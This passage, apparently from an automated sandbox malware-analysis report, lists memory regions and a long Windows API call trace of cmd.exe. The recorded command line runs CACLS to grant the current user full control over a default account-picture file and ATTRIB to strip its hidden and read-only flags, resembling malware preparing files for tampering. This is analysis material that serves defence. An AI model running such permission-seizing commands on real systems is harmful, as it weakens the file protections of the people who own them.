"c:\\windows\\system32\\ntdll.dll") Region: id = 24900 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24901 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24902 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 24903 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24942 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24943 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24944 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24945 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 24946 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 24947 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24948 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24949 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24950 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24951 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24952 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24953 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24954 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24955 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24956 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 24957 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24958 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24959 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 24960 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 24961 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 24962 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 24963 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 24964 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 24965 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 24968 start_va = 0x13f0000 end_va = 0x16befff entry_point = 0x13f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 442 os_tid = 0xc50 [0178.932] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaac | out: lpSystemTimeAsFileTime=0x1afaac*(dwLowDateTime=0xa04f1900, dwHighDateTime=0x1d440a9)) [0178.932] GetCurrentProcessId () returned 0xa14 [0178.932] GetCurrentThreadId () returned 0xc50 [0178.932] GetTickCount () returned 0x33bd7 [0178.932] QueryPerformanceCounter (in: lpPerformanceCount=0x1afaa4 | out: lpPerformanceCount=0x1afaa4*=23572117032) returned 1 [0178.933] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0178.933] __set_app_type (_Type=0x1) [0178.933] __p__fmode () returned 0x76b331f4 [0178.933] __p__commode () returned 0x76b331fc [0178.933] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0178.933] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0178.933] GetCurrentThreadId () returned 0xc50 [0178.933] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc50) returned 0x38 [0178.933] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.933] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0178.933] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.934] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.934] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa3c | out: phkResult=0x1afa3c*=0x0) returned 0x2 [0178.934] VirtualQuery (in: lpAddress=0x1afa73, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0178.934] GetConsoleOutputCP () returned 0x1b5 [0178.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.934] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0178.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.934] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0178.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.935] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.935] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0178.935] GetEnvironmentStringsW () returned 0x2e0308* [0178.935] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.936] GetEnvironmentStringsW () returned 0x2e0308* [0178.936] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.936] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9ac | out: phkResult=0x1ae9ac*=0x40) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0xb8, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x0, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegCloseKey (hKey=0x40) returned 0x0 [0178.936] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9ac | out: phkResult=0x1ae9ac*=0x40) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x0, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x9, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x9, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x9, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegCloseKey (hKey=0x40) returned 0x0 [0178.936] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638e [0178.936] srand (_Seed=0x5b88638e) [0178.936] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" [0178.937] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" [0178.937] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0178.937] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.937] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.937] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.937] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0178.937] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0178.937] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0178.937] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0178.937] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0178.937] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0178.937] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0178.937] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0178.937] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0178.938] GetEnvironmentStringsW () returned 0x2e2458* [0178.938] FreeEnvironmentStringsW (penv=0x2e2458) returned 1 [0178.938] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.938] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.938] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0178.938] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0178.938] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0178.938] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0178.938] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0178.938] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0178.938] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0178.938] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0178.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af778 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.938] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af778, lpFilePart=0x1af774 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af774*="Desktop") returned 0x18 [0178.938] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0178.938] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4f4 | out: lpFindFileData=0x1af4f4) returned 0x2e0ae8 [0178.938] FindClose (in: hFindFile=0x2e0ae8 | out: hFindFile=0x2e0ae8) returned 1 [0178.938] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4f4 | out: lpFindFileData=0x1af4f4) returned 0x2e0ae8 [0178.938] FindClose (in: hFindFile=0x2e0ae8 | out: hFindFile=0x2e0ae8) returned 1 [0178.938] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4f4 | out: lpFindFileData=0x1af4f4) returned 0x2e0ae8 [0178.939] FindClose (in: hFindFile=0x2e0ae8 | out: hFindFile=0x2e0ae8) returned 1 [0178.939] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0178.939] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0178.939] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0178.939] GetEnvironmentStringsW () returned 0x2e0308* [0178.939] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.939] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.939] GetConsoleOutputCP () returned 0x1b5 [0178.940] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.940] GetUserDefaultLCID () returned 0x409 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8b8, cchData=128 | out: lpLCData="0") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8b8, cchData=128 | out: lpLCData="0") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8b8, cchData=128 | out: lpLCData="1") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0178.940] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0178.941] GetConsoleTitleW (in: lpConsoleTitle=0x2d09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.941] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.941] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0178.942] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0178.942] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0178.942] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0178.943] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0178.943] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0178.943] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0178.943] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0178.943] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0178.943] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0178.943] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0178.946] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0178.946] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0178.946] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0178.946] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0178.946] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0178.946] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0178.946] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0178.948] GetConsoleTitleW (in: lpConsoleTitle=0x1af54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.955] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0178.955] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0178.955] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0178.955] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0178.955] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0178.955] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0178.955] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0178.955] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0178.955] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0178.955] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0178.955] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0178.955] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0178.955] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0178.955] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0178.955] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0178.955] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0178.955] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0178.955] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0178.956] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0178.956] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0178.956] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0178.956] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0178.956] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0178.956] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0178.956] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0178.956] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0178.956] _wcsicmp (_String1="CACLS", 